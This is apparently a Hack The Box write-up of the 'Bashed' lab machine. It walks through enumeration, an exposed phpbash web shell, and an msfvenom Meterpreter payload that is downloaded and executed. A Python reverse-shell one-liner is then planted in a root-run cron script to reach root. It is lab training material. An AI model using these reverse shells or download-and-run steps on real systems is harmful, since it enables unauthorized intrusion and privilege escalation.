Bashed – Hack The Box


I will skip the usual “add the host IP to /etc/hosts” etc etc etc…

Enumerate ports:

nmap -p- bashed.htb
Starting Nmap 7.93 ( ) at 2023-01-09 10:35 EST
Nmap scan report for bashed.htb (
Host is up (0.066s latency).
Not shown: 65534 closed tcp ports (conn-refused)
80/tcp open  http

Visit the URL at http://bashed.htb/

Quickly enumerate using dirb:

$ dirb http://bashed.htb/ 

DIRB v2.22    
By The Dark Raver

START_TIME: Mon Jan  9 10:36:05 2023
URL_BASE: http://bashed.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt


GENERATED WORDS: 4612                                                          

---- Scanning URL: http://bashed.htb/ ----
==> DIRECTORY: http://bashed.htb/css/                                                                                   
==> DIRECTORY: http://bashed.htb/dev/

Take a wild guess and append /phpbash.php to /dev/, and voila:

User pwned.

PS: It is even easier if you click on the article link in the home page.

Onto r0ot!

First, let’s get a Meterpreter reverse shell to make out lives easier:

In Kali:

$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST= LPORT=4444 -f elf -o shelly.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 130 bytes
Final size of elf file: 250 bytes
Saved as: shelly.elf

$ python3 -m http.server 80
Serving HTTP on port 80 ( ... - - [09/Jan/2023 10:47:32] "GET /shelly.elf HTTP/1.1" 200 -

$ msfconsole   
msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost
lhost =>
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > run

In http://bashed.htb/dev/phpbash.php:

www-data@bashed:/tmp# cd /tmp
www-data@bashed:/tmp# wget

--2023-01-09 07:47:43--
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 250 [application/octet-stream]
Saving to: 'shelly.elf'

0K 100% 996K=0s

2023-01-09 07:47:43 (996 KB/s) - 'shelly.elf' saved [250/250]

www-data@bashed:/tmp# chmod 755 shelly.elf
www-data@bashed:/tmp# ./shelly.elf

Back in Kali:

[*] Started reverse TCP handler on 
[*] Sending stage (3045348 bytes) to
[*] Meterpreter session 1 opened ( -> at 2023-01-09 10:49:43 -0500

meterpreter > getuid
Server username: www-data

I can easily get root using the exploit/linux/local/bpf_sign_extension_priv_esc payload since this is a 5-year-old machine, but I want to look around for the intended path first.

After some digging around, I managed to escalate privileges as user scriptmanager:

$ sudo -l 
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass,

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL
$ sudo -u scriptmanager bash -i
$ id
uid=1001(scriptmanager) gid=1001(scriptmanager) groups=1001(scriptmanager)

When out of ideas, try

$ cd /tmp
$ wget
$ chmod 755
$ ./

Interesting, let’s investigate:

$ ls -hali /scripts
total 16K
34468 drwxrwxr--  2 scriptmanager scriptmanager 4.0K Jun  2  2022 .
    2 drwxr-xr-x 23 root          root          4.0K Jun  2  2022 ..
43823 -rw-r--r--  1 scriptmanager scriptmanager   58 Dec  4  2017
34781 -rw-r--r--  1 root          root            12 Jan  9 08:19 test.txt

$ cat
f = open("test.txt", "w")
f.write("testing 123!")

$ cat test.txt 
testing 123!

text.txt has a very recent timestamp and is owned by root, which means root is likely executing regularly. Let’s put a reverse shell in there (this time without Metasploit for the fun of it). Run this locally:

$ nc -lvnp 6666

And on the remote machine as scriptmanager:

$ echo 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",6666));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")' > /scripts/

$ cat /scripts/
import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",6666));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")

After a few seconds, we get a connection back from root and we find the flag:

$ nc -lvnp 6666      
listening on [any] 6666 ...
connect to [] from (UNKNOWN) [] 37194

# id
uid=0(root) gid=0(root) groups=0(root)

# cat /root/root.txt

What did we learn from this machine? It pays off to fight the urge to use an easy exploit with Metasploit. This was undoubtedly a more exciting path.